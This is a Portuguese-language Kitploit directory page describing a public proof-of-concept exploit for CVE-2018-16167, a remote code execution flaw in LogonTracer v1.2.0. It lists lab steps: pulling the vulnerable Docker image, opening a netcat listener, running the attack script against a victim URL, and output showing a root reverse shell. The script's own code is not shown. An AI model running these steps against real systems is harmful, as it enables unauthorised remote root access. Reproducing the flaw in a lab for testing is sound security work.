Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-16167 — Exploração de prova de conceito para a vulnerabilidade de execução remota de código no LogonTracer v1.2.0, fornecendo um shell reverso via Python e netcat. | Kitploit
Ferramentas/GitHubGitHub/dnr6419/cve-2018-16167
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubdnr6419/cve-2018-16167

CVE-2018-16167

Exploração de prova de conceito para a vulnerabilidade de execução remota de código no LogonTracer v1.2.0, fornecendo um shell reverso via Python e netcat.

Ver Repositório
30há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ordem de instalação e execução

0. Instalação do LogonTracer

Baixe a versão 1.2.0 do logontracer, onde a vulnerabilidade foi descoberta, do dockerhub.

 $docker pull jpcertcc/docker-logontracer:v1.2.0 

1. Execução do LogonTracer

Carregue no contêiner com o seguinte comando:

 $docker run \
   --detach \
   --publish=7474:7474 --publish=7687:7687 --publish=8080:8080 \
   -e LTHOSTNAME=[IP_ADDR] \
   jpcertcc/docker-logontracer:v1.2.0

2. Host para obter shell via nc

Abra uma porta específica no host onde obterá o shell usando nc.

 
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp {attacker_port}
listening on [any] 8888 ...

3. Execução do código de ataque

Execute o código de ataque.

 
dnr6419@DESKTOP-4CJA7LD ~/docker/logon
☺  python3 go.py {attacker_ip} {attacker_port} http://{victime_ip}:8080

Resultado da execução

Conforme mostrado na figura abaixo, é possível ver que o código de ataque foi executado com sucesso e um shell remoto foi obtido.

PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp 8888
listening on [any] 8888 ...
192.168.56.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.103] 41858: NO_DATA
/usr/local/src/LogonTracer # ^[[16;30Rid
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/usr/local/src/LogonTracer # ^[[20;30R

image

Baixar ferramenta